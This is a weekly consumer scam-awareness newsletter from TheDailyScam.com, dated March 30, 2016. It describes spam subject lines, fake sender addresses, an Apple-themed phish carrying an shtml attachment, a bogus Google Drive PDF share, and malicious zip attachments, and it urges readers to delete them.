Please support our effort by making a small donation. Thank you!

x

March 30, 2016

THE WEEK IN REVIEW

A funny thing happened during the last week in scamland. Some criminal mastermind from one of the major scam gangs came up with a new idea and decided he liked it so much that he used it in subject lines of thousands of scams we saw. This mastermind decided that he wants to give us choices! Look at this weeks’ subject lines below lifted from sample scam emails during the last week to see what we mean. It was funny to see so many of these.

Also, just a reminder that it is still tax season and we continue to see a lot of tax scam emails such as this one with the subject line “Online Tax Preparation.” The text in the email is very slick and well written. Also, the bogus U.S. Treasury and IRS phone calls are also still very popular as they target Americans. We found this article on ABCNews.com about a smartphone app capable of identifying incoming calls from known tax scam phone numbers and blocking them immediately. We have no idea how effective it is but it sure seems like a great idea! Check it out.

 

Sample Scam Subject Lines:

Check out Top 10 Listings for Identity Theft Today

Compare Top 12 options for Francise Business

Compare Top 13 Listings for Wireless Internet Today

Compare Top 14 Options in Substance Abuse

Compare upto Top 18 Options for Dui Lawyers

Explore Top 10 Options in Remodel Kitchen

Explore Up-To Top 19 Cosmetic Dentistry Listings

Search Top 15 Options in Thyroid Treatment

Search Top 16 Personal Injury lawyers Listings

Search top 19 Listings for Alaska Cruises Today

Search Up-To Top 11 Cholesterol Management Listings

View Top 16 Options in Vision Correction

View Top 19 Options in Retirement Planning

Sample Scam Email Addresses:

+=+CarInsurance+=+@beinging.top

-AttorneyLegalHelp-@thanity.top

Amazon-Prime-Bonus@djien.ntemper.top

Checking_Account@kotoju.top

CreditCardProcessing@greatedly.download

GrandCanyonAdventures@polyhs.download

hummingbirdvineoffer@humvin.download

LastMinuteTaxPreparation@histoidit.download

matchcom-[YOUR EMAIL]@ventmill.com

PopularDogFoodProducts@cartwheelml.download

TaxPreparation@histoidit.download

TradeshowBusinessTools@prenuous.download

WirelessSecurityCameras@lagmeo.download

 

 

 

Phish NETS: Apple Phish Hiding Ransomware Link?

Have you heard of ransomware? It is a particularly nasty piece of malware that, once initiated, quickly encrypts all your personal files so they cannot be opened. Unless you have the encryption key. The criminals who trick you into installing ransomware on both Apple or Windows computers are happy to sell you the encryption key. Prices range from as low as $300 to as much as $2000 and are most often purchased through the untraceable Internet currency called bitcoins, which brings us to this week’s phishing scam.

We found yet another phishing scam pretending to be an Apple GSX email “notification alert.” But rather than a malicious link, this email contained a very dangerous attached shtml file:

 

We have written about the risks of opening web files such as html or htm files. (Check out our article called Filenames Will Set You Free!) However, the shtml file is even more dangerous because this type of file allows for “server side includes.” In other words, an shtml file offers instructions to a server to process information even as you are viewing the file. Coming from the hands of a criminal, an shtml file is capable of doing serious harm to a person’s local computer by employing the processing power of a server to inflict damage. At first we thought this email was just another plain old phishing scam. However, we cracked open the file and when we looked at the code we found this precious snippet…

3-GSX Apple phish bitcoin code

The personal data being collected by the shtml file is posted to a website in Palau (2-letter country code = .pw) called ebitcoin.pw. Palau is an archipelago of more than 500 islands, part of the Micronesia region in the western Pacific Ocean. We found this particularly interesting because of the recent popular association between bitcoins and ransomware. (Check out this article on the Bitcoin News Service titled What Came First, Bitcoin or Ransomware?March 25, 2016) We wondered if this shtml file, with directives issued by a server and a link to a site named for bitcoins, was in fact a malicious initiation of encyrption if opened on a personal computer. Of course we didn’t want to risk viewing the shtml file in real time so we can’t be certain.

Also, the domain ebitcoin.pw was registered on March 17 by Dumitru Bogdan through Namecheap.com. What makes this even more curious is that legitimate bitcoin sites can be found at bitcoin.org and bitcoin.com, not ebitcoin.pw.

Delete fast.

Your Money: Affordable Movers, Bathroom Renovation, and Travel to Alaska

This next email was sent from Movers@clickonthis.pro. “Affordable Movers at Your Service.” The domain “clickonthis.pro” was registered on March 16 using Alpnames to the company called Digital Technical. Our loyal readers will recognize this bogus company because we’ve written about this company in several past newsletters… February 24 (http://www.thedailyscam.com/february-24-2016/), March 2 (http://www.thedailyscam.com/march-2-2016/) , and March 9 (http://www.thedailyscam.com/march-9-2016/).

Just delete!

4-Affordable movers at your service

Thinking about renovating a bathroom and interested in some bathroom renovation resources? Need some ideas for stylish and affordable bathroom renovations? This email will hurt a lot more than it will help. This email’s style looks like so many of the scam emails we report on. There are many ways to investigate this one but all you need to do is look at the unsubscribe link after the graphic… Look familiar? “Lemon Juice” in Houston, TX? The scammers use this bogus company a lot. When we searched Google for this company along with its address, we got 140 links to scam/spam messages from around the Internet. Check out Google’s returns.

5-Bathroom renovation resources

Is your family thinking about travel plans? How about Alaska? According to this email you can “find amazing Alaska cruises” through their link to alaskatrip.pro. And of course it’s another scam from the same criminal gang who sent the other two emails described above. Look at the address in the “unsubscribe here” under the graphic. Our longtime readers should also recognize the company listed at the bottom of the email. Futurebright Solutions from Grandville, Michigan is another bogus company often used by these criminals to legitimize their scams. We’ve reported on Futurebright Solutions many times, most recently in our newsletter from January 27.

6-Travel to Alaska

 

 

TOP STORY: Shared a PDF on Google Drive

This week’s top story is about another dangerous example of social engineering. What makes this so dangerous is that the email came from a user’s hacked account and sent to everyone in their contact list. Would you have clicked the link if you had received this email from a friend’s account you recognize?

So-and-so shared the following PDF: Docup8date1370515.pdf Supposedly this pdf file is shared with you on Google Drive. Except it’s a lie. A mouse-over of both the “Open” and pdf link point to a file on the webserver compuvellsadecv.com.

Compuvellsadecv.com? This is certainly not Google, but is it safe to check out? We asked both Virustotal.com and the Zulu URL Risk Analyzer to check this link. There responses were crystal clear…

 

 

9-Shared a pdf on Google drive 3

In fact, Zulu found 7 malicious links waiting for you at the website compuvellsadecv.com. This is a definite delete! We say it over and over! Mousing-over a link to see where it leads BEFORE clicking is one of the most important skills people need to stay safe. We have many links on TheDailyScam.com that teach folks how to mouse-over.

10-Shared a pdf on Google drive 4


FOR YOUR SAFETY: Image PDF, Fax Transmission, and Invoice Statement

Is it a pdf? Or an image? Or a pdf file of an image? But these emails all come with an attached zip file. Of course the file is malicious. Here’s a sample and below you’ll see a screenshot showing many such emails targeting one email server. We’ve obscured the “from” addresses as well as the “to” addresses because the emails were spoofed so that they appeared to be sent from the same person who received the email. This trick is a well-practiced form of social engineering meant to engage your curiosity. Why does this email come from me? What is this? CLICK.

 

 

12-Image pdf list of emails

Expecting a fax? “Please find attached to this email a facsimile transmission we have just received on your behalf.” Yeah, right.

Delete!

 

 

 

“Please find attached the statement (S#516105) that matches back to your invoices. Can you please sign and return.” Except that the zip file is malicious. And we all say….deeeleete!

13-fax transmission

What do these next 3 scams have in common? Look closely… And then check out what the Zulu URL Risk Analyzer has to say about what they all have in common!

 

15-397com-Call your bank immediately

 

 

 

17-397com-Your download link -Elite Profits Trader

 

 

ON THE LIGHTER SIDE: Excessive Sweating

Imagine having to do a presentation for your boss and a whole group of executives. Can you feel the pressure? Are you starting to sweat? Thank goodness for this product. It’s certainly original!

18-Stop excessive sweating

 

Until next week, surf safely!